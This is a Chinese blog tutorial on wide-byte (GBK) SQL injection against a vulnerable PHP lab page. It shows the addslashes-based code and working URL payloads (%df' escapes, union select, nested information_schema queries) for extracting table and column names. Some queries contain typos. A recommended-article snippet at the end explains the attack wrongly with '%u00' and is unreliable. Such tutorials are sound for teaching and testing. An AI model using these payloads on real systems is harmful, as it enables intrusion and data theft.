SQL注入之宽字节注入攻击

最新推荐文章于 2025-03-21 21:43:33 发布
最新推荐文章于 2025-03-21 21:43:33 发布
阅读量534 收藏 1
点赞数
分类专栏: 渗透测试
原文链接:https://www.ms08067.com/
版权

目录

1 宽字节注入代码分析

2 数据库展示

3 注入过程

1 宽字节注入代码分析

在宽字节注入页面中,程序获取GET参数ID,并对参数ID使用addslashes()转义,然后拼接到SQL语句中,进行查询,代码如下。

<?php

$conn = mysql_connect('localhost', 'root', 'qwer') or die('bad!');
mysql_select_db('security', $conn) OR emMsg("数据库连接失败");
mysql_query("SET NAMES 'gbk'",$conn);

$id = addslashes($_GET['id']);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result = mysql_query($sql, $conn) or die(mysql_error()); 
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo $row['username'] . $row['password'];
  	}
	else 
	{
	print_r(mysql_error());
	}      

?>
</font> 
<?php

echo "<br>The Query String is : ".$sql ."<br>";

?>

当访问id=1'时,执行的SQL语句为:

SELECT * FROM users WHERE id='1\''

可以看到单引号被转义符"\” 转义,所以在一般情况下,是无法注入的,但由于在数据库查询前执行了SET NAMES' GBK',将编码设置为宽字节GBK,所以此处存在宽字节注入漏洞。
在PHP中,通过iconv () 进行编码转换时,也可能存在宽字符注入漏洞。

2 数据库展示

3 注入过程

访问id=1',页面的返回结果如图所示,程序并没有报错,反而多了一个转义符(反斜杠\)

单引号被转义

从返回的结果可以看出,参数id=1在数据库查询时是被单引号包围的。当传入id=1' 时,传入的单引号又被转义符(反斜线)转义,导致参数ID无法逃逸单引号的包围,所以在一般情况下,此处是不存在SQL注入漏洞的。不过有一个特例, 就是当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体
字"連",所以这时,单引号成功逃逸,报出MySQL数据库的错误,如图所示。

由于输入的参数id=1',导致SQL语句多了一个单引号,所以需要使用注释符来注释程序自身的单引号。访问id=1%df'%23,页面返回的结果如图所示,可以看到,SQL语句已经符合语法规范。

使用and 1=1和and 1=2进一步判断注入,访问 id=1%df' and 1=1%23id=1%df' and 1=2%23,返回结果如下两图所示。

当and 1= 1程序返回正常时,and 1= 2程序返回错误,所以判断该参数ID存在SQL注入漏洞

接着使用order by查询数据库表的字段数量,最后得知字段数为3,如下所示。

order by 3没问题
order by 4出问题啦

因为页面直接显示了数据库中的内容,所以可以使用Union查询。与Union注入一样,此时的Union语句是union select 1, 2, 3,为了让页面返回Union查询的结果,需要把ID的值改为负数,结果如图所示。

于是后面就是正常的union注入了。尝试在页面中2的位置查询当前数据库的库名(database () ),语句为:

id=-1%df' union select 1, user(),3%23


返回的结果如上图所示。

查询数据库的表名时,一把使用如下语句。

select table_name from information_schema.tables where table_schema='security' limit 0,1

但是此时,由于单引号被转义,会自动多出反斜杠,导致SQL语句出错,所以此处需要利用另一种方法:嵌套查询。就是在一个查询语句中, 再添加一个查询语句,下列就是更改后的查询数据库表名的语句。

select table_name from information_schema.tables where table_schema= (select databse()) limit0,1

可以看到,原本的table_schema='security'变成了table_schema=(select database()),因为select database () 的结果就是'security',这就是嵌套查询,结果如下图所示。

id=-1%df' union select 1,(select table_name from information_schema.tables where table_schema=(select database())limit 0,1),3%23

从返回结果可以看到,数据库的第一个表名是emails, 如果想查询后面的表名,还需修改limit后的数字,这里不再重复。使用以下语句尝试查询emails表里的字段。

id=-1%df' union select 1,(select column_name from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 0,1)limit 0,1),3%23

 这里使用了三层嵌套,第一层是table_ schema,它代表库名的嵌套,第二层和第三层是table_ name的嵌套。我们可以看到语句中有两个limit,前一个limit控制表名的顺序,后一个则控制字段名的顺序。如这里查询的不是emails表,而是users表,则需要更改limit的值。如上图所示,后面的操作如Union注入所示,这里不再重复。

sqlmap跑宽字节注入(渗透测试之SQL注入宽字节注入)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-09 1045
宽字节注入就是用一个大于128的十六进制数来吃掉转义符,gbk编码,字节作为一个字符的编码手工注入 一、什么是宽字节注入 宽字节是相对于ascII这样单字节而言的;像 GB2312、GBK、GB18030、BIG5、Shift_JIS 等这些都是常说的宽字节,实际上只有两字节。GBK 是一种多字符的编码,通常来说,一个 gbk 编码汉字,占用2个字节。一个 utf-8 编码的汉字,占用3个字节。 转义函数:为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义; 宽字节注入指的是 mysql 数据
Sql漏洞注入宽字节注入
Matheus的博客
07-30 648
绕过–宽字节注入攻击 宽字节注入攻击 由于sql注入的盛行,不少网站管理员都意识到了这种攻击方式的厉害,纷纷想出不少办法来避免,例如使用一些 Mysql 中转义的函数 addslashes,mysql_real_escape_string, mysql_escape_string等等。其实这些函数就是为了过滤用户输入的一些数据,对特殊的字符加上反斜杠“\”进行转义。 Addslashes()函数:对get、post、cookie等传递的参数中的’、“、\、null等进行转义 mysql_real_esca
SQL注入宽字节注入
qq_68163788的博客
01-31 3301
宽字节注入中,攻击者利用数据库编码中的特性,通常是双字节字符编码(如GB2312、GBK等),来绕过应用程序对输入进行的过滤。攻击者可以通过在输入中插入特定的编码字符来修改SQL查询的语义,从而执行恶意操作。这种技术通常用于绕过应用程序对单字节字符的过滤,使得攻击者能够成功注入恶意SQL代码。 举个例子,假设应用程序在处理用户输入时没有正确过滤并且使用了双字节字符编码。攻击者可以在输入中插入特定的双字节字符,使得SQL查询被修改,从而绕过认证、获取敏感数据或者修改数据库内容。
sql宽字节注入
qq_63157899的博客
04-07 4749
sql注入中最关键的一步就是将引号进行闭合,而常见的addslashes()函数、mysql_escape_string函数、get_magic_quotes_gpc()函数、mysql_real_escape_string()函数的使用将引号进行了转义,这时我们要绕过这些函数进行注入宽字节注入就是其中一种方法。 何时能进行宽字节注入 1.mysql数据库使用GBK编码 2.对引号进行了转义(加\) 特殊情况: 1.数据库使用了安全的编码模式 2.使用了iconv() 函数进行一些特殊
SQL注入宽字节注入sql注入到getshell,sqlmap注入的使用)和XSS漏洞(存储型)实战练习(DVWA靶场)
最新发布
m0_74292210的博客
03-21 595
因为网站会把用户输入的'前面加\进行处理,\会被编码为%5c,但是在查询中把%df和%5c通过GBK编码为汉字。在我们的请求里面,网站已经把我们输入的%编码为了%25,不能达到我们的目的,所以手动修改数据包。发现name做了长度限制,可以通过抓包或者改前端html来绕过。然后发现name做了<script>的替换,然后可以开始绕过。发现方法有效,该点存在宽字节注入漏洞,然后开始正式爆破。所以在'前加一个%df就可以把网站给我们加的\给绕过。过滤,绕不过去,只能从name注入。数据库名为pikachu。
sql注入宽字节注入
weixin_45653478的博客
04-09 816
如果数据库设置宽字节字 符集 gbk 会导致宽字节注入,从而逃逸 gpc 前提条件 简单理解:数据库编码与 PHP 编码设置为不同的两个编码那么就有可能产生宽字 节注入 深入讲解:要有宽字节注入漏洞,首先要满足数据库后端使用双/多字节解析 SQL 语句,其次还要保证在该种字符集范围中包含低字节位是 0x5C(01011100) 的字 符,初步的测试结果 Big5 和 GBK 字符集都是有的, UTF-8 和 GB2312 没 有这种字符(也就不存在宽字节注入)。
SQL注入宽字节注入
m0_46467017的博客
08-09 1737
如果一个字符的大小是一个字节的,称为窄字节;如果一个字符的大小是两个字节的,则称为宽字节。像等这些编码都是常说的宽字节,也就是只有两个字节。英文默认占一个字节,中午占两个字节。原理:宽字节注入发送的位置就是PHP发送请求到MYSQL时字符集使用设置一次编码。在使用PHP连接Mysql的时候,当设置时会导致一个编码转换的问题,也就是我们熟悉的宽字节注入。...
SQL注入 - 宽字节注入
HAKUNAMATATATTA的博客
09-05 1368
宽字节注入主要是绕过魔术引号的,数据库解析中除了UTF-8编码外的所有编码如:GBK等都有可能存在宽字节注入
第十九节 宽字节SQL注入-01
09-15
宽字节SQL注入是一种特殊类型的SQL注入攻击,主要针对使用宽字节字符集(如GBK、UTF-16等)的数据库管理系统。宽字节SQL注入攻击的关键在于exploit宽字节字符集的特性来 bypass 数据库的安全机制。 宽字节字符集 ...
sql注入--宽字节注入
pakho_C的博客
01-03 737
sql注入宽字节注入 靶场:sqli-labs-master 下载链接:靶场下载链接 第32关 php源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); function check_addslashes($string) { $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\",
SQL宽字节注入
qq_64332865的博客
02-19 3442
宽字节注入适用于cms和数据库对字符串的编码方式不统一、WAF利用 AddSlashes()等函数对敏感字符进行转义的场景。 统一的国际规范的理想状态是所有应用程序都使用Unicode编码,所有的网站 都使用UTF-8编码。但因为一些历史原因,国内及国外(特别是非英语国家)的一些cms仍然使用着自己国家的一套编码(如GBK);也有一些cms为了考 虑老用户,出了GBK和 UTF-8两个版本。 一个GBK编码汉字,占用2个字节;一个UTF-8编码的汉字,占用3-4个字节。当Web应用程序的编码方式为GBK,而
SQL注入-宽字节注入
渗透笔记
01-13 765
1. GBK编码 gbk为中文编码,是一种双字节编码,将两个字节编译为一个汉字,其中第一个字节称为高位字节,第二个字节称为低位字节。 编码范围 高位81-FE 低位40-FE 2.宽字节注入原理 2.1php测试代码 error_reporting(0); $id = $_GET['id']; $id = addslashes($id);
SQL注入——宽字节注入
一只web狗
06-21 576
宽字节注入简介
渗透测试-SQL注入宽字节注入
lza20001103的博客
04-20 9625
渗透测试-SQL注入宽字节注入
SQL 注入宽字节注入的原理
06-09
宽字节注入是一种常见的 SQL 注入技术,它利用了一些编码方式对非 ASCII 字符进行编码的特点,从而绕过某些安全机制,达到执行恶意 SQL 语句的目的。 宽字节注入的原理是将非 ASCII 字符编码为多个 ASCII 字符,然后将这些 ASCII 字符作为参数传递给应用程序,应用程序在解析这些参数时,可能会将其视为多个独立的字符,从而绕过一些安全机制。 例如,假设我们有一个包含语句的 Web 应用程序: ``` SELECT * FROM users WHERE username='admin' AND password='123456'; ``` 如果我们想使用宽字节注入技术来执行恶意 SQL 语句,我们可以将输入的用户名编码为 UTF-8 格式,并在其后面添加一个宽字节(%u00),这样就可以绕过应用程序的安全机制,注入额外的 SQL 语句,例如: ``` SELECT * FROM users WHERE username='admin%u00' OR 1=1 -- ' AND password='123456'; ``` 在这个例子中,%u00 是一个宽字节,它将 'a' 编码为 '%61%00',这样在应用程序解析这个参数时,它会将其视为两个独立的字符:'a' 和 '\u00'。因此,应用程序将执行以下 SQL 语句: ``` SELECT * FROM users WHERE username='admin' OR 1=1 -- ' AND password='123456'; ``` 其中,'--' 表示注释符号,它可以使后面的 SQL 语句被忽略,从而达到绕过验证的目的。 需要注意的是,宽字节注入是一种常见的 SQL 注入技术,但并不是万能的,它只能绕过一些简单的安全机制,对于一些高级安全机制可能无法生效。因此,在开发应用程序时,应该使用参数化查询或 ORM 框架等技术来防止 SQL 注入攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值